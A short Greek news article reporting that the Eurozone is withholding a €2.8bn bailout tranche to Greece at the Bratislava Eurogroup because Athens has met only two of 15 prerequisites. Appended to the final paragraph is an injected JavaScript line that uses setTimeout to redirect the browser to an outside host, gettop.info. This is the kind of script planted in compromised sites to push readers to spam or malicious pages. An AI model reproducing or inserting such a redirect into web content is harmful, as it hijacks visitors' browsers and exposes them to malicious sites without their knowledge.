«Κόκκινο φως» από την Ευρωζώνη στα 2,8 δισ € προς την Ελλάδα

0
9

 

Επικαλούμενη διπλωματικές πηγές, η γερμανική οικονομική εφημερίδα Handelsblatt Global αναφέρει πως η Ευρωζώνη δεν θα δώσει το πράσινο φως στο Eurogroup της Μπρατισλάβας για την απελευθέρωση της αναμενόμενης δόσης των 2,8 δισ. ευρώ του προγράμματος στήριξης της Ελλάδας.

Σύμφωνα με τις πηγές που επικαλείται η εφημερίδα, η Ελλάδα δεν θα πάρει τη δόση μέσα στον Σεπτέμβριο και ο λόγος είναι πως η Αθήνα έχει υλοποιήσει μόλις δύο από τα 15 προαπαιτούμενα για την εκταμίευση της δόσης. Επίσης στην ελληνική κυβέρνηση πιστώνονται αργοί ρυθμοί στις αποκρατικοποιήσεις.

Στο δημοσίευμα αναφέρεται ότι το Eurogroup έχει ήδη εκταμιεύσει 7,5 δισ. από τα συνολικά 10,3 προς την Αθήνα, ενώ αναμένονταν μέσα στον Σεπτέμβριο τα υπόλοιπα.

Σύμφωνα με διπλωματικές πηγές στο Eurogroup θα συζητηθεί μόνο η πορεία εκτέλεσης των προαπαιτούμενων.

Η συγκεκριμένη διαρροή ήρθε λίγο μετά τη δήλωση του επικεφαλής του ESM Κλάους Ρέγκλινγκ ότι η Ελλάδα θα μπορούσε να εξασφαλίσει βραχυπρόθεσμα μέτρα ελάφρυνσης τους χρέους αν παραμείνει προσηλωμένη στο πρόγραμμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here